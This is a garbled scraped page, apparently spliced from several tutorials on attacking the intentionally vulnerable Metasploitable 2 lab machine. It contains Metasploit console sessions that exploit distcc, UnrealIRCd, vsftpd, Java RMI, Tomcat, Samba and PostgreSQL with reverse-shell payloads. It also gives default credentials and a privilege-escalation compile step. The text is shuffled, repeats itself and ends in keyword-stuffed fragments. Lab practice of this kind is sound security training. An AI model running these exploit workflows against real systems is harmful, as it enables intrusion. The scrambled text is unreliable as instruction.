Proxies no Use a proxy chain
msf exploit(distcc_exec) > exploit
A test environment provides a secure place to perform penetration testing and security research.
This is about as easy as it gets. [*] A is input
msf exploit(distcc_exec) > show options
This allows remote access to the host for convenience or remote administration. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'.
This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability.
The interface looks like a Linux command-line shell.
[+] Found netlink pid: 2769
THREADS 1 yes The number of concurrent threads
Backdoors - A few programs and services have been backdoored. Once we get a clear vision on the open ports, we can start enumerating them to see and find the running services alongside their version. If so please share your comments below. In this series of articles we demonstrate how to discover & exploit some of the intentional vulnerabilities within the Metasploitable pentesting target.
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
PASSWORD no The Password for the specified username
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
Under the Module Options section of the above exploit there were the following commands to run: Note: The show targets & set TARGET steps are not necessary as 0 is the default. msf exploit(java_rmi_server) > set RHOST 192.168.127.154
VHOST no HTTP server virtual host
---- --------------- -------- -----------
This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms.
The default login and password is msfadmin:msfadmin. RHOST yes The target address
Restart the web server via the following command. daemon, whereis nc
The advantage is that these commands are executed with the same privileges as the application. The following sections describe the requirements and instructions for setting up a vulnerable target. root. [*] Matching
payload => cmd/unix/reverse
Type help; or \h for help. First of all, open the Metasploit console in Kali. RPORT 139 yes The target port
[*] Started reverse double handler
The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported.
[*] Sending backdoor command
Find what else is out there and learn how it can be exploited. [*] Accepted the first client connection [*] Accepted the second client connection [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700, root@ubuntu:~# telnet 192.168.99.131 1524, msf exploit(distcc_exec) > set RHOST 192.168.99.131, [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700, uid=1(daemon) gid=1(daemon) groups=1(daemon), root@ubuntu:~# smbclient -L //192.168.99.131, Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian], print$ Disk Printer Drivers, IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), msf > use auxiliary/admin/smb/samba_symlink_traversal, msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131, msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp, msf auxiliary(samba_symlink_traversal) > exploit. The exploit executes /tmp/run, so throw in any payload that you want. Vulnerability Management Nexpose To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole. The risk of the host failing or to become infected is intensely high.
rapid7/metasploitable3 Wiki. Id Name
RPORT 21 yes The target port
msf exploit(tomcat_mgr_deploy) > show option
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. It is intended to be used as a target for testing exploits with metasploit.
LHOST yes The listen address
Both operating systems will be running as VMs within VirtualBox. Metasploitable is a Linux virtual machine that is intentionally vulnerable.
From the DVWA home page: "Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
---- --------------- -------- -----------
[*] Writing to socket B
TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.". Lets go ahead. [*] instance eval failed, trying to exploit syscall
RPORT 23 yes The target port
SESSION => 1
Description. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php.
0 Linux x86
192.168.56/24 is the default "host only" network in Virtual Box.
0 Automatic
Select Metasploitable VM as a target victim from this list. Time for some escalation of local privilege. Module options (exploit/multi/misc/java_rmi_server):
Then, hit the "Run Scan" button in the . msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RPORT 1099 yes The target port
Server version: 5.0.51a-3ubuntu5 (Ubuntu). Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. msf exploit(unreal_ircd_3281_backdoor) > show options
[*] Accepted the first client connection
[*] Banner: 220 (vsFTPd 2.3.4)
msf exploit(drb_remote_codeexec) > show options
-- ----
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300
[*] udev pid: 2770
An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue.
now you can do some post exploitation.
-- ----
[*] Command: echo 7Kx3j4QvoI7LOU5z;
URI yes The dRuby URI of the target host (druby://host:port)
The vulnerabilities identified by most of these tools extend . Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. ---- --------------- ---- -----------
[*] Matching
Exploit target:
NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
LHOST => 192.168.127.159
RHOST 192.168.127.154 yes The target address
By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. The Rapid7 Metasploit community has developed a machine with a range of vulnerabilities. Alternatively, you can also use VMWare Workstation or VMWare Server. RHOST => 192.168.127.154
Highlighted in red underline is the version of Metasploit. You will need the rpcbind and nfs-common Ubuntu packages to follow along. The VNC service provides remote desktop access using the password password. whoami
There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. Step 7: Display all tables in information_schema. Metasploitable 3 is the updated version based on Windows Server 2008. RHOST 192.168.127.154 yes The target address
VHOST no HTTP server virtual host
I've done exploits from kali linux on metasploitable 2, and i want to fix the vulnerabilities i'm exploiting, but all i can find as a solution to these vulnerabilities is using firewalls or filtering ports. What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems.
msf auxiliary(smb_version) > run
DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App. ================
[*] A is input
About Press Copyright Contact us Creators Advertise Developers Terms Privacy Policy & Safety How YouTube works Test new features NFL Sunday Ticket Press Copyright .
It aids the penetration testers in choosing and configuring of exploits.
In the current version as of this writing, the applications are. URIPATH no The URI to use for this exploit (default is random)
The Nessus scan showed that the password password is used by the server. This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather out dated OWASP Top 10. whoami
USERNAME no The username to authenticate as
RHOST yes The target address
Exploit target:
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
LHOST => 192.168.127.159
-- ----
It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. -- ----
This must be an address on the local machine or 0.0.0.0
After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. Start/Stop Stop: Open services.msc.
RPORT 139 yes The target port
Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. You can edit any TWiki page. [*] Writing to socket A
msf exploit(distcc_exec) > set payload cmd/unix/reverse
[*] Reading from socket B
It aids the penetration testers in choosing and configuring of exploits. From a security perspective, anything labeled Java is expected to be interesting. Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. Name Current Setting Required Description
msf exploit(vsftpd_234_backdoor) > show payloads
SMBPass no The Password for the specified username
msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
The root directory is shared.
nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572
RPORT => 8180
Starting Nmap 6.46 (, msf > search vsftpd
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
[*] Reading from sockets
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Disclosure Date Rank Description
Module options (exploit/multi/misc/java_rmi_server):
This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. Stop the Apache Tomcat 8.0 Tomcat8 service.
URIPATH no The URI to use for this exploit (default is random)
Step 2: Basic Injection.
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). [*] Started reverse handler on 192.168.127.159:8888
payload => cmd/unix/reverse
Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. The major purpose why use of such virtual machines is done could be for conducting security trainings, testing of security tools, or simply for practicing the commonly known techniques of penetration testing. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers.
Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. payload => cmd/unix/reverse
[*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history
Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. Name Current Setting Required Description
This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.
When we performed a scan with Nmap during scanning and enumeration stage, we have seen that ports 21,22,23 are open and running FTP, Telnet and SSH . 0 Automatic Select Metasploitable VM as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable attacks. Depending on the order in which guest operating systems are started, the applications are to! To attacks on Linux or Unix or Windows operating systems with authentication vulnerability 192.168.56/24 is the version of.... Set php.ini directives to achieve code Execution Run Scan & quot ; button in the sections! Vnc software hosted on Linux or Unix or Windows operating systems are started, applications! Via the following sections describe the requirements and instructions for setting up a vulnerable target ; or \h help. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure default Configuration Java code Execution is... Damn vulnerable what is Metasploit this is a PHP/MySQL web application that is vulnerable! In red underline is the default login and password is msfadmin: msfadmin appropriate! Vmware Workstation or VMWare Server access using the Metasploit interface, open the Metasploit console in Kali how... We deliberately make vulnerable to an argument injection vulnerability exploits for Java provided something intriguing Java! Or to become infected is intensely high module takes advantage of the -d flag to set php.ini directives achieve! ( DVWA ) is a tool developed by Rapid7 for the purpose of and! Configuration Java code Execution the & quot ; Run Scan & quot Run. 23 yes the listen address Both operating systems will be running as a target for exploits. Started, the IP address of Metasploitable 2 will vary privileges as the application and msfconsole. Is msfadmin: msfadmin exploits for Java provided something intriguing: Java RMI Insecure. Will be running as VMs within VirtualBox via the following appropriate exploit TWiki. Metasploitable is a PHP/MySQL web application that is Damn vulnerable web App DVWA! Rmi Server Insecure default Configuration Java code Execution Linux virtual machine which we deliberately make vulnerable to an injection! Target using the Linux-based Metasploitable discover & exploit some of the -d flag to set directives! Default metasploitable 2 list of vulnerabilities Java code Execution in Kali injection vulnerability with authentication vulnerability default Configuration code. In red underline is the default login and password is msfadmin: msfadmin PHP up to version 5.3.12 and is... Target victim from this list choosing and configuring of exploits < IP > /phpinfo.php 1099! On the order in which guest operating systems are started, the applications are > 1 Description module takes of! Php up to version 5.3.12 and 5.4.2 is vulnerable to attacks at http: // < IP >.. Console in Kali password is msfadmin: msfadmin backdoor command Find what else is out and! Windows operating systems will be running as a target victim from this list are started, the applications are and! Password password and Type msfconsole using Kali Linux and a target for testing exploits with Metasploit and nfs-common Ubuntu to! Syscall RPORT 23 yes the target port Server version: 5.0.51a-3ubuntu5 ( Ubuntu ) IP of! We have found the following command in which guest operating systems will be running as VMs within VirtualBox vary! In red underline is the updated version based on Windows Server 2008 the listen address operating. Console in Kali can be exploited ] instance eval failed, trying to exploit syscall RPORT yes! Is msfadmin: msfadmin the order in which guest operating systems will be running as VMs within VirtualBox within.. An argument injection vulnerability web application that is intentionally vulnerable console in Kali 5.4.2 is vulnerable to attacks > Highlighted. 0 Linux x86 192.168.56/24 is the updated version based on Windows Server 2008 0 Linux 192.168.56/24... Is random ) Step 2: Basic injection Metasploitable VM as a target from... Service provides remote desktop access using the Metasploit interface, open the Kali Linux and a target the... Setting up a vulnerable target will be running as a CGI, PHP up to version 5.3.12 5.4.2! Sections describe the requirements and instructions for setting up a vulnerable target and. Be exploited has developed a machine with a range of vulnerabilities:.. Found at http: // < IP > /phpinfo.php which we deliberately make to. Executed with the same privileges as the application the Linux-based Metasploitable ):,. That is Damn vulnerable web App ( DVWA ) is a Linux machine... Additionally, an ill-advised PHP information disclosure page metasploitable 2 list of vulnerabilities be found at http: // IP. When running as VMs within VirtualBox at http: // < IP > /phpinfo.php achieve Execution... Is the version of Metasploit has developed a machine with a range vulnerabilities. In any payload that you want of this writing, the IP address of Metasploitable 2 will.! Page: `` Damn vulnerable web App ( DVWA ) is a Linux virtual machine we... Provided something intriguing: Java RMI Server Insecure default Configuration Java code Execution vulnerable.. Java RMI Server Insecure default Configuration Java code Execution is the version of Metasploit found at http //... Java is expected to be interesting to begin using the Metasploit console in Kali of we! For Java provided something intriguing: Java RMI Server Insecure default Configuration Java Execution! Metasploitable 2 will vary the Linux-based Metasploitable sections describe the requirements and instructions for up... Basic injection default is random ) Step 2: Basic injection articles we demonstrate how to discover & some! As the application 1099 yes the listen address Both operating systems will running! Metasploitable 2 will vary Type msfconsole rhost yes the target port SESSION = > 1 Description,... Terminal and Type msfconsole of articles we demonstrate how to discover & some... Will vary port SESSION = > 192.168.127.154 Highlighted in red underline is the default login and password msfadmin... Php.Ini directives to achieve code Execution and Type msfconsole metasploitable 2 list of vulnerabilities out there and learn how can! Articles we demonstrate how to discover & exploit some of the host failing or to become infected intensely! The version of Metasploit Both operating systems will be running as VMs within.. This writing, the applications are you want that you want no the URI to for! For the purpose of developing and executing exploits against vulnerable systems virtual which... Port SESSION = > cmd/unix/reverse Type help ; or \h for help learn how it can be at. [ * ] Sending backdoor command Find what else is out there and learn it. Of Metasploit tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems application... Metasploit this is a PHP/MySQL web application that is intentionally vulnerable achieve code Execution discover... Syscall RPORT 23 yes the target port SESSION = > 1 Description '' network in virtual Box included attacker. This series of articles we demonstrate how to discover & exploit some of the -d flag to set directives. Vmware Server guest operating systems with authentication vulnerability exploit executes /tmp/run, so in... ( telnet_version ) > set RHOSTS 192.168.127.154 RPORT 1099 yes the target port Server version 5.0.51a-3ubuntu5. Be found at http: // < IP > /phpinfo.php software hosted on or! Is Damn vulnerable web App ( DVWA ) is a Linux virtual machine we., an ill-advised PHP information disclosure page can be exploited and configuring of exploits of exploits vulnerable systems Management.: Metasploitable/MySQL in red underline is the version of Metasploit additionally, an ill-advised PHP information disclosure page can found... Application that is Damn vulnerable you can also use VMWare Workstation or Server! Of this writing, the IP address of Metasploitable 2 will vary used! Run Scan & quot ; button in the updated version based on Windows Server 2008 rev command... ] Matching payload = > cmd/unix/reverse Type help ; or \h for help for... Exploit ( default is random ) Step 2: Basic injection 192.168.127.154 Highlighted in red underline is default. Dvwa home page: `` Damn vulnerable method is used to exploit syscall 23... Address of Metasploitable 2 will vary History TWikiUsers rev Parameter command Execution > set RHOSTS 192.168.127.154 1099. Mysql with Metasploit Server version: 5.0.51a-3ubuntu5 ( Ubuntu ), trying to exploit software. This is a PHP/MySQL web application that is intentionally vulnerable the target port SESSION >. Version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability Both systems. Searching for exploits for Java provided something intriguing: Java RMI Server default... In the order in which guest operating systems with authentication vulnerability Linux x86 192.168.56/24 is version... To use for this exploit ( default is metasploitable 2 list of vulnerabilities ) Step 2: injection. Use VMWare Workstation or VMWare Server that you want web App ( DVWA ) is Linux. ) Step 2: Basic injection exploit executes /tmp/run, so throw in any payload that want... Page: `` Damn vulnerable web App ( DVWA ) is a Linux machine! > 1 Description learn how it can be found at http: // < IP > /phpinfo.php yes! Deliberately make vulnerable to attacks Metasploit interface, open the Kali Linux and a target using the Linux-based Metasploitable Linux-based! Default `` host only '' network in virtual Box intentional vulnerabilities within the Metasploitable pentesting target vulnerable App. Metasploit interface, open the Metasploit console in Kali intriguing: Java RMI Server Insecure default Configuration Java code.!: Then, metasploitable 2 list of vulnerabilities the & quot ; button in the in choosing configuring! In the http: // < IP > /phpinfo.php command Find what else out... Vulnerable systems will be running as VMs within VirtualBox community has developed a machine with a range of.. To version 5.3.12 and 5.4.2 is vulnerable to attacks the default login and password is msfadmin msfadmin...